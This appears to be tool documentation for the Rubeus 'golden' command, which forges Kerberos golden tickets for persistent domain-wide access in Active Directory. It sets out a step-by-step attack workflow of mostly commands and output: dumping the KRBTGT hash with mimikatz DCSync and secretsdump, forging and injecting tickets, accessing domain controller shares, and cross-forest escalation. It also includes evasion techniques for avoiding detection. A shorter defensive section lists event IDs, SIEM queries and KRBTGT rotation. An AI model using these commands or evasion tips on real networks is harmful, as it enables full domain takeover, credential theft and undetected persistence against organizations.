golden

Golden Ticket attacks represent the pinnacle of Active Directory persistence, providing domain-wide access that persists even after password changes and system reboots.

Overview

Golden tickets are forged Ticket Granting Tickets (TGTs) created using the KRBTGT account’s password hash. These tickets provide persistent, high-privilege access to Active Directory environments by appearing completely legitimate to domain controllers.

Domain Persistence

Maintain access even after credential rotations

Full Privileges

Domain Admin level access across the environment

Stealth Operations

Tickets appear legitimate to security controls

Attack Prerequisites

Obtain KRBTGT Hash

Extract the KRBTGT account password hash through DCSync or other methods

Domain Information

Gather domain SID, domain name, and target user information

Ticket Creation

Forge the golden ticket with desired privileges and validity

Ticket Injection

Apply the forged ticket to gain domain-wide access

Syntax Variations

Manual Mode
LDAP Mode
Output & Injection

# Manual specification of all parameters
Rubeus.exe golden /user:admin /domain:corp.local /sid:S-1-5-21-123456789-987654321-111111111 /rc4:krbtgt_hash

# Let Rubeus gather domain information automatically
Rubeus.exe golden /user:admin /rc4:krbtgt_hash /ldap

# Create ticket and apply immediately
Rubeus.exe golden /user:admin /domain:corp.local /sid:domain_sid /rc4:krbtgt_hash /ptt

Required Parameters

user

string

required

Username for the forged ticket

Show Username Options

Real Users: Use existing domain accounts for stealth
Fake Users: Create non-existent users (still works)
Administrative: Target high-privilege account names
Service Accounts: Impersonate service accounts

KRBTGT Authentication

Hide Hash Types

des

string

DES-CBC-MD5 hash (legacy, not recommended)

rc4

string

RC4-HMAC hash (NTLM format)

aes128

string

AES128-CTS-HMAC-SHA1-96 key

aes256

string

AES256-CTS-HMAC-SHA1-96 key (recommended)

Domain Information

Show Manual Configuration

domain

string

Target domain name (FQDN format)

sid

string

Domain Security Identifier

Show SID Discovery Methods

# PowerShell method
Get-ADDomain | Select-Object DomainSID

# Using whoami
whoami /user

# Using wmic
wmic useraccount where name='Administrator' get sid

netbios

string

NetBIOS domain name (optional)

Show LDAP Automatic Discovery

ldap

boolean

Automatically gather domain information via LDAP

string

Specific domain controller for LDAP queries

Ticket Customization

Show User Identity

number

User ID (RID) for the ticket

displayname

string

Full display name for the user

groups

string

Comma-separated list of group RIDs

Show Common Group RIDs

512: Domain Admins
513: Domain Users
518: Schema Admins
519: Enterprise Admins
520: Group Policy Creator Owners

pgid

number

Primary Group ID (default: 513 - Domain Users)

Show Timing Configuration

authtime

string

Authentication time (default: now)

starttime

string

Ticket start time (default: now)

endtime

string

Ticket expiration time

renewtill

string

Renewable until time (default: 10 years)

Show Advanced Options

flags

string

Ticket flags (default: 0x40e10000)

Show Common Flags

0x40e10000 - Standard forwardable, renewable ticket
0x60a10000 - Include name canonicalize
0x40a50000 - Delegation-capable ticket

uac

string

User Account Control flags

sids

string

Additional SIDs to include

oldpac

boolean

Use legacy PAC format for compatibility

Output Options

Show Ticket Output

outfile

string

Save forged ticket to file (.kirbi format)

ptt

boolean

Pass-the-ticket: inject forged ticket immediately

printcmd

boolean

Print command line for ticket creation

Response Format

Successful Creation
LDAP Discovery
Error Scenarios

[*] Action: Build TGT

[*] Building PAC

[*] Domain         : CORP.LOCAL (CORP)
[*] SID            : S-1-5-21-1234567890-987654321-111111111
[*] UserId         : 500
[*] Groups         : 512,513,518,519,520
[*] ServiceKey     : aes256_key_here
[*] ServiceKeyType : aes256_cts_hmac_sha1
[*] KDCKey         : aes256_key_here
[*] KDCKeyType     : aes256_cts_hmac_sha1
[*] Service        : krbtgt
[*] Target         : CORP.LOCAL

[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'admin@CORP.LOCAL'

[*] AuthTime       : 10/25/2024 1:23:45 PM
[*] StartTime      : 10/25/2024 1:23:45 PM
[*] EndTime        : 10/25/2034 1:23:45 PM
[*] RenewTill      : 10/25/2034 1:23:45 PM

[*] base64(ticket.kirbi):
      doIFujCCBbagAwIBBaEDAgEWooIEujCCBLahggS2MIIEsqADAgEFoQwbCkNPUlAuTE9D
      QUyhHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCmNvcnAubG9jYWyjggR9MIIEeaADAgESoQMC
      AQKiggRrBIIEZ2P+9l3v9...

PAC Information

object

Details about the Privilege Attribute Certificate

Show PAC Fields

Domain: Target domain and NetBIOS name
SID: Domain Security Identifier
UserId: User RID in the ticket
Groups: Group memberships granted

Encryption Details

object

Cryptographic information about the ticket

Show Encryption Fields

ServiceKey: KRBTGT key used for signing
ServiceKeyType: Encryption algorithm used
KDCKey: Key Distribution Center key

Ticket Timing

object

Validity periods for the forged ticket

Show Time Fields

AuthTime: When authentication occurred
StartTime: When ticket becomes valid
EndTime: When ticket expires
RenewTill: Latest renewal time

Base64 Ticket

string

The forged TGT in base64 format for use or storage

[*] Action: Build TGT

[*] Using LDAP to retrieve information for CORP.LOCAL

[*] Searching path 'LDAP://DC=corp,DC=local' for '(objectClass=domain)'
[*] Found domain object: DC=corp,DC=local
[*] Domain SID: S-1-5-21-1234567890-987654321-111111111

[*] Searching for target user 'admin'
[*] Found user object: CN=Administrator,CN=Users,DC=corp,DC=local
[*] User SID: S-1-5-21-1234567890-987654321-111111111-500

[*] Building PAC
[*] Domain         : CORP.LOCAL (CORP)
[*] SID            : S-1-5-21-1234567890-987654321-111111111
[*] UserId         : 500
[*] Groups         : 512,513,518,519,520

LDAP mode automatically discovers domain information, making golden ticket creation much easier by eliminating the need to manually specify domain SID and other parameters.

[!] Invalid KRBTGT hash format!
[!] Please provide a valid RC4, AES128, or AES256 hash.

[!] Unable to connect to domain controller for LDAP queries.
[!] Please check network connectivity and domain name.

[!] Insufficient privileges for LDAP queries.
[!] Consider using manual mode with /domain and /sid parameters.

Common error scenarios:

Invalid hash format: KRBTGT hash must be valid hex string
Network issues: LDAP mode requires DC connectivity
Permissions: LDAP queries need authenticated domain access
Invalid SID: Manual mode requires correct domain SID format

Complete Attack Workflow

Obtain KRBTGT Hash

Extract KRBTGT credentials using DCSync or other methods:

# Using Mimikatz
mimikatz.exe "lsadump::dcsync /user:krbtgt"

# Using Impacket
secretsdump.py domain/user:password@dc01.corp.local

# Using Rubeus with delegation
Rubeus.exe dump /service:krbtgt /nowrap

Domain Information Gathering

Collect required domain information (if not using LDAP mode):

# Get domain SID
Get-ADDomain | Select-Object DomainSID

# Alternative method
whoami /user

Golden Ticket Creation

Create the forged TGT with appropriate parameters:

# LDAP mode (recommended)
Rubeus.exe golden /user:admin /rc4:krbtgt_ntlm_hash /ldap /ptt

# Manual mode
Rubeus.exe golden /user:admin /domain:corp.local /sid:S-1-5-21... /rc4:krbtgt_hash /ptt

Verification and Usage

Verify the ticket was created and test access:

# List current tickets
Rubeus.exe klist

# Test domain controller access
dir \\dc01.corp.local\c$

# Request service tickets
Rubeus.exe asktgs /service:cifs/fileserver.corp.local

Persistence Operations

Use the golden ticket for persistent access:

# Save ticket for later use
Rubeus.exe golden /user:admin /rc4:krbtgt_hash /ldap /outfile:golden.kirbi

# Create additional tickets as needed
Rubeus.exe golden /user:serviceaccount /rc4:krbtgt_hash /ldap /groups:513,1001

Advanced Usage Scenarios

Stealth Operations
Cross-Domain Operations
Bulk Operations

Hide Realistic User Simulation

# Create ticket for existing user with normal privileges
Rubeus.exe golden /user:john.doe /rc4:krbtgt_hash /ldap /groups:513 /id:1001

# Gradually escalate with additional tickets
Rubeus.exe golden /user:john.doe /rc4:krbtgt_hash /ldap /groups:513,1001,1002

Show Time-Based Evasion

# Create ticket with realistic timing
Rubeus.exe golden /user:admin /rc4:krbtgt_hash /ldap /authtime:"10/25/2024 09:00:00" /endtime:"10/25/2024 17:00:00"

# Short-lived ticket for specific operations
Rubeus.exe golden /user:admin /rc4:krbtgt_hash /ldap /endtime:"10/25/2024 23:59:59"

Show Service Account Impersonation

# Impersonate service accounts
Rubeus.exe golden /user:svc_sql /rc4:krbtgt_hash /ldap /groups:513 /id:1100

# Machine account impersonation
Rubeus.exe golden /user:COMPUTER$ /rc4:krbtgt_hash /ldap /groups:515

Hide Child Domain Access

# Target child domain
Rubeus.exe golden /user:admin /domain:child.corp.local /rc4:krbtgt_hash /ldap

# Use parent domain KRBTGT for child access
Rubeus.exe golden /user:admin /domain:child.corp.local /sid:child_domain_sid /rc4:parent_krbtgt_hash

Show Trust Relationships

# Cross-forest trust exploitation
Rubeus.exe golden /user:admin /domain:partner.com /sid:partner_domain_sid /rc4:trust_key

# Enterprise Admin across forest
Rubeus.exe golden /user:admin /domain:corp.local /rc4:krbtgt_hash /groups:519 /ldap

Hide Multiple User Tickets

# Create tickets for multiple users
Rubeus.exe golden /user:admin /rc4:krbtgt_hash /ldap /outfile:admin.kirbi
Rubeus.exe golden /user:backup_admin /rc4:krbtgt_hash /ldap /outfile:backup.kirbi
Rubeus.exe golden /user:service_admin /rc4:krbtgt_hash /ldap /outfile:service.kirbi

Show Different Privilege Levels

# Domain Admin level
Rubeus.exe golden /user:domain_admin /rc4:krbtgt_hash /ldap /groups:512,513,518,519,520

# Standard user level
Rubeus.exe golden /user:normal_user /rc4:krbtgt_hash /ldap /groups:513

# Service account level
Rubeus.exe golden /user:svc_account /rc4:krbtgt_hash /ldap /groups:513,1001,1002

OPSEC Considerations

High-Impact Attack: Golden tickets provide complete domain access and can be detected through various monitoring techniques.

Detection Vectors
Evasion Techniques
Defensive Countermeasures

Hide Ticket Analysis

Unusual Ticket Characteristics:

Tickets with 10-year validity periods
Non-existent usernames in tickets
Tickets created outside normal hours
Unusual group memberships or privileges

Behavioral Indicators:

Authentication without prior logon events
Access to resources without service ticket requests
Privileged operations from low-privilege accounts

Show Event Log Monitoring

Windows Event Logs:

Event 4769: Service ticket requests with unusual patterns
Event 4768: TGT requests that don’t correlate with golden ticket usage
Event 4624: Logon events that may not occur with golden tickets
Event 4672: Special privileges assigned without normal authentication

Show Network Monitoring

Kerberos traffic analysis for unusual patterns
TGS requests without corresponding TGT requests
Authentication to services without normal authentication flow
Unusual timing patterns in authentication events

Hide Realistic Ticket Parameters

# Use realistic validity periods
Rubeus.exe golden /user:admin /rc4:krbtgt_hash /ldap /endtime:"12/31/2024 23:59:59"

# Use existing usernames
Rubeus.exe golden /user:existing_admin /rc4:krbtgt_hash /ldap

# Use standard group memberships
Rubeus.exe golden /user:admin /rc4:krbtgt_hash /ldap /groups:512,513

Show Timing Considerations

# Create tickets during business hours
Rubeus.exe golden /user:admin /rc4:krbtgt_hash /ldap /authtime:"10/25/2024 10:30:00"

# Use realistic authentication times
Rubeus.exe golden /user:admin /rc4:krbtgt_hash /ldap /authtime:"10/25/2024 08:15:00" /starttime:"10/25/2024 08:15:00"

Show Operational Patterns

Limit the number of golden tickets created
Use different usernames for different operations
Avoid obvious administrative actions immediately after ticket creation
Blend with normal business activity patterns

Show KRBTGT Protection

Preventive Measures:

Regular KRBTGT password rotation (recommended: twice)
Implement privileged access management (PAM)
Monitor KRBTGT account access and changes
Restrict DCSync permissions to necessary accounts only

Detection Rules:

Monitor for DCSync operations against KRBTGT
Alert on unusual KRBTGT password changes
Track accounts with replication permissions

Show Ticket Monitoring

Advanced Detection:

Implement Kerberos ticket inspection
Monitor for tickets with unusual characteristics
Correlate authentication events with user behavior
Use machine learning for authentication anomaly detection

SIEM Rules:

-- Detect long-lived tickets
SELECT * FROM kerberos_events
WHERE ticket_lifetime > '1 day'
AND user NOT IN (service_accounts)

-- Detect unusual group memberships
SELECT * FROM kerberos_events
WHERE groups CONTAINS 'unusual_high_privilege_groups'

Troubleshooting

Show Common Issues

Hash Format Issues
LDAP Connectivity
Access Issues

Problem: Invalid KRBTGT hash format errorsSolutions:

Verify hash is exactly 32 characters for RC4
Ensure AES keys are proper length (32 chars for AES128, 64 for AES256)
Remove any spaces or line breaks from hash
Verify hash was extracted correctly

# Verify hash format
echo "hash_length: ${#krbtgt_hash}"

# Test with RC4 hash
Rubeus.exe golden /user:test /rc4:32ed87bdb5fdc5e9cba88547376818d4 /domain:corp.local /sid:S-1-5-21...

Problem: LDAP queries failing in automatic modeSolutions:

Verify domain controller connectivity
Check DNS resolution for domain name
Ensure current user has domain authentication
Try manual mode if LDAP fails

# Test LDAP connectivity
nslookup corp.local

# Use manual mode as fallback
Rubeus.exe golden /user:admin /domain:corp.local /sid:S-1-5-21... /rc4:krbtgt_hash

Problem: Forged ticket doesn’t provide expected accessSolutions:

Verify ticket was injected successfully
Check group memberships in ticket
Ensure target services are accessible
Verify KRBTGT hash is current

# Verify ticket injection
Rubeus.exe klist

# Test with different groups
Rubeus.exe golden /user:admin /rc4:krbtgt_hash /ldap /groups:512,513,518,519,520

# Describe ticket contents
Rubeus.exe describe /ticket:golden.kirbi

Integration with Other Attacks

DCSync Integration

Use DCSync to obtain KRBTGT hash for golden ticket creation

Lateral Movement

Use golden tickets to access remote systems and services

Persistence Chains

Combine with other persistence techniques for redundant access

Privilege Escalation

Escalate from limited access to domain administrator privileges

silver

Create service-specific forged tickets

diamond

Create hybrid legitimate/forged tickets

ptt

Inject golden tickets into sessions

describe

Analyze golden ticket structure

Getting Started

Ticket Operations

Attack Techniques

Miscellaneous

Overview

Domain Persistence

Full Privileges

Stealth Operations

Attack Prerequisites

Syntax Variations

Required Parameters

KRBTGT Authentication

Domain Information

Ticket Customization

Output Options

Response Format

Complete Attack Workflow

Advanced Usage Scenarios

OPSEC Considerations

Troubleshooting

Integration with Other Attacks

DCSync Integration

Lateral Movement

Persistence Chains

Privilege Escalation

silver

diamond

ptt

describe

Getting Started

Ticket Operations

Attack Techniques

Miscellaneous

​Overview

Domain Persistence

Full Privileges

Stealth Operations

​Attack Prerequisites

​Syntax Variations

​Required Parameters

​KRBTGT Authentication

​Domain Information

​Ticket Customization

​Output Options

​Response Format

​Complete Attack Workflow

​Advanced Usage Scenarios

​OPSEC Considerations

​Troubleshooting

​Integration with Other Attacks

DCSync Integration

Lateral Movement

Persistence Chains

Privilege Escalation

​Related Commands

silver

diamond

ptt

describe

Overview

Attack Prerequisites

Syntax Variations

Required Parameters

KRBTGT Authentication

Domain Information

Ticket Customization

Output Options

Response Format

Complete Attack Workflow

Advanced Usage Scenarios

OPSEC Considerations

Troubleshooting

Integration with Other Attacks

Related Commands